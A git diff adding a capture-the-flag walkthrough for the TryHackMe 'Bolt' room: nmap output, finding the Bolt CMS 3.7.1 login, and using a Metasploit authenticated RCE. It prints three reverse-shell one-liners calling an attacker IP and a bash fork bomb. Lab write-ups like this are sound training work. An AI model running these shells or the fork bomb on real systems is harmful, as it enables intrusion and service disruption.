diff --git a/TryHackMe/Bolt.md b/TryHackMe/Bolt.md
new file mode 100644
index 0000000..a894015
--- /dev/null
+++ b/TryHackMe/Bolt.md
@@ -0,0 +1,191 @@
+# TryHackMe-Bolt
+
+> Abdullah Rizwan | 2:42 PM | 1st November , 2020
+
+## NMAP
+
+```
+Nmap scan report for 10.10.241.83
+Host is up (0.18s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
+| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
+|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+8000/tcp open http (PHP 7.2.32-1)
+| fingerprint-strings:
+| FourOhFourRequest:
+| HTTP/1.0 404 Not Found
+| Date: Sun, 01 Nov 2020 09:48:10 GMT
+| Connection: close
+| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
+| Cache-Control: private, must-revalidate
+| Date: Sun, 01 Nov 2020 09:48:10 GMT
+| Content-Type: text/html; charset=UTF-8
+| pragma: no-cache
+| expires: -1
+| X-Debug-Token: 37c7d1
+|
+|
+|
+|
+|
+| Bolt | A hero is unleashed
+|
+|
+|
+|
+|
+|
+| href="#main-content" class="vis
+| GetRequest:
+| HTTP/1.0 200 OK
+| Date: Sun, 01 Nov 2020 09:48:10 GMT
+| Connection: close
+| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
+| Cache-Control: public, s-maxage=600
+| Date: Sun, 01 Nov 2020 09:48:10 GMT
+| Content-Type: text/html; charset=UTF-8
+| X-Debug-Token: 970304
+|
+|
+|
+|
+|
+| Bolt | A hero is unleashed
+|
+|
+|
+|
+|
+|
+|_
+|_http-generator: Bolt
+|_http-open-proxy: Proxy might be redirecting requests
+|_http-title: Bolt | A hero is unleashed
+service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin
+submit.cgi?new-service :
+SF-Port8000-TCP:V=7.80%I=7%D=11/1%Time=5F9E845A%P=x86_64-pc-linux-gnu%r(Ge
+SF:tRequest,29E1,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sun,\x2001\x20Nov\x20
+SF:2020\x2009:48:10\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP
+SF:/7\.2\.32-1\+ubuntu18\.04\.1\+deb\.sury\.org\+1\r\nCache-Control:\x20pu
+SF:blic,\x20s-maxage=600\r\nDate:\x20Sun,\x2001\x20Nov\x202020\x2009:48:10
+SF:\x20GMT\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nX-Debug-Toke
+SF:n:\x20970304\r\n\r\n\n\n\x20\
+SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x2
+SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20Bolt\x20\|\x20A
+SF:\x20hero\x20is\x20unleashed\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2
+SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20
+SF:\x20\x20\t\n\x20\x20\x2
+SF:0\x20\t\
+SF:n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x
+SF:20\x20\x20\x20\x20\x20\x20\x20\n\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\
+SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2
+SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
+SF:0\x20\x20Bolt\x20\|\x20A\x20hero\x20is\x20unleashed\n\x2
+SF:x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x2
+SF:0\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
+SF:0\x20\x20Bolt\x20\|\x20A\x20hero\x20is\x20unleashed\n\x2
+SF:0\x20\x20\x20\x20\x20\x20\x20\n
+SF:\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
+SF:\x20\x20\n\x20\x20\x20\x20\t\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x
+SF:20\x20\x20\x20\x20\x20\x20\x20
+
+
+
+
+There exists a login page in bolt cms , I had to google that what is the page name of the login and it is `/bolt`
+
+
+
+Login to the cms
+
+
+
+Here on bottom left you can bolt cms version which is `Bolt 3.7.1`
+
+
+## Searchsploit
+
+Now search for any exploit available for `bolt cms`
+
+
+
+This exploit stands out perferctly because this authenticated RCE and we have the creds
+
+## Metasploit
+
+Let's look at metasplolit too , for that I tired using `search bolt` but no results came up ,then tried `search cms` a lot of cms exploits results came up
+
+
+
+So now it doesn't matter which exploit you use either metasploit or exploit-db but in this case since we are following what the rooms we are going to go with
+`metasploit`
+
+Configure the exploit
+
+
+
+We will have a session created
+
+
+
+
+If you wish to have a stabilize shell , run a reverse shell command to get a stablize shell , set a listener and try one these reverse shells
+
+```
+bash -i >& /dev/tcp/10.14.3.143/6666 0>&1
+nc -e /bin/sh 10.14.3.143 6666
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.143 6666 >/tmp/f
+
+```
+
+
+
+
+
+Only the unix version of netcat reverse shell worked
+
+
+
+## ForkBomb
+
+`:() { :|:& };: &`
+
+
+